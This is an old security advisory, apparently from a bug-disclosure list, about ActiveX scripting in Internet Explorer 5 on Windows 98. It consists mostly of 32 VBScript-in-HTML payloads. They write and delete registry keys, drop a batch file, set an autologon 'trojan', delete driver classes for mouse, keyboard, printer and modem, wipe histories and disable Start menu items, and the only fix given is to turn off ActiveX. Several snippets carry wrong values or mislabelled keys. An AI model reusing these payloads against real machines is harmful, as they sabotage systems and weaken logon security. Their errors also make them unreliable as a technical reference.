COMMAND
activex
SYSTEMS AFFECTED
Win98 (at least)
PROBLEM
Freddy Laplaine sent following to Security Bugware. Following
was tested with windows 98 and IE5:
1] Write in the windows registry
2] Delete in the windows registry
3] Create a bath file
4] Create a shorcut in the desktop
5] Clean the menu Start-Execute
6] Mask acces network
7] Disable the program who runs in the autostart
8] mask the last name of user windows
9] Modify the computer name
10] delette the arrow on the shorcuts
11] refresh with f5 key
12] choose a lengh password minimum for winlogon session
13] disable Start-program-msdos
14] mask the file system button
15] delete the history for explorer
16] create a trojan in html with automatic login on windows98
17] delete mouse drivers
18] delete printer drivers
19] delete ports Com1-com2 drivers
20] delete keyboard drivers
21] delete modem
22] delete media controler
23] disabled the monitor
24] disabled the hard drive controler
25] Clean the cache folder of netscape
26] delete nukenaber
27] delete remote connection
28] close the menu start-find
29] close the menu start-document
30] close the menu start-execute
31] close the option start-shutdown
32] close the menu start-favoris
1] Write in the windows registry
================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\toto\With\Name", "it's a test"
</script>
</body>
</html>
2] Delete in the windows registry
=================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\toto\"
</script>
</body>
</html>
3] Create a bath file
=====================
<html>
<body>
<script Language="VBScript">
if location.protocol = "file:" then
Set FSO = CreateObject("Scripting.FileSystemObject")
HPath = Replace(location.href, "/", "\")
HPath = Replace(HPath, "file:\\\", "")
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set BatFile = FSO.CreateTextFile("c:\Windows\toto.bat", 2, False)
BatFile.WriteLine ""
BatFile.WriteLine "bonjour"
BatFile.Close
end if
</script>
</body>
</html>
4] Create a shorcut in the desktop
==================================
<html>
<body>
<script Language="VBScript">
if location.protocol = "file:" then
Set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
HPath = Replace(location.href, "/", "\")
HPath = Replace(HPath, "file:\\\", "")
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set RealLink = WshShell.CreateShortcut("C:\WINDOWS\bureau\zataz.url")
RealLink.TargetPath = "http://www.zataz.com/"
RealLink.Save
end if
</script>
</body>
</html>
5] Clean the menu Start-Execute
===============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
</script>
</body>
</html>
6] Mask acces network
=====================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupSecurityPage"
, 1, "REG_DWORD"
</script>
</body>
</html>
7] Disable the program who runs in the autostart
================================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
</script>
</body>
</html>
8] mask the last name of user windows
=====================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Regwrite "HKEY_LOCAL_MACHINE\Network\Logon\DontShowLastUser", 0,"REG_DWORD"
</script>
</body>
</html>
9] Modify the computer name
===========================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName","caca"
</script>
</body>
</html>
10] delette the arrow on the shorcuts
=====================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\IsShortcut"
</script>
</body>
</html>
11] refresh with f5 key
=======================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update", 0 ,"REG_DWORD"
</script>
</body>
</html>
12] choose a minimum size password for winlogon session
=======================================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\Network\MinPwdLen",0,"REG_DWORD"
</script>
</body>
</html>
13] disable Start-program-msdos
===============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
</script>
</body>
</html>
14] mask the file system button
===============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\System\NoFileSysPage",1,"REG_DWORD"
</script>
</body>
</html>
15] delete the history for explorer
===================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\RecentDocs\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\RunMru\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\Doc Find Spec MRU\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\FindComputerMRU\"
</script>
</body>
</html>
16] create a trojan in html with automatic login on windows98
=============================================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultUserName", "login"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultPassword", "password"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\AutoAdminLogon",1,"REG_DWORD"
</script>
</body>
</html>
17] delete mouse drivers
========================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mouse\"
</script>
</body>
</html>
18] Delete printer
==================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Printer\"
</script>
</body>
</html>
19] Delete port COm1-com2
=========================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Ports\"
</script>
</body>
</html>
20] Delete keyboard
===================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Keyboard\"
</script>
</body>
</html>
21] Delete modem
================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Modem\"
</script>
</body>
</html>
22] Delete medias controler
===========================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\MEDIA\"
</script>
</body>
</html>
23] Delete monitor
==================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Monitor\"
</script>
</body>
</html>
24] Delete the hard drive controler
===================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\PCMIA\"
</script>
</body>
</html>
25] Clean the cache directory for netscape
==========================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\Cache"
</script>
</body>
</html>
26] delete Nuke naber
=====================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Sofware\NukeNabber 7.0"
</script>
</body>
</html>
27] delete the remote connections
=================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\RemoteAccess"
</script>
</body>
</html>
28] close the menu start-find
=============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", 0 ,"REG_DWORD"
</script>
</body>
</html>
29] close the menu start-document
=================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu", 0 ,"REG_DWORD"
</script>
</body>
</html>
30] close the menu start-execute
================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", 0 ,"REG_DWORD"
</script>
</body>
</html>
31] close the options start-shutdown
====================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", 0 ,"REG_DWORD"
</script>
</body>
</html>
32] close the menu -Favorites
=============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu", 0 ,"REG_DWORD"
</script>
</body>
</html>
SOLUTION
Well, you don't have to know French or any other language to know
following rule: SHUT DOWN ACTIVEX!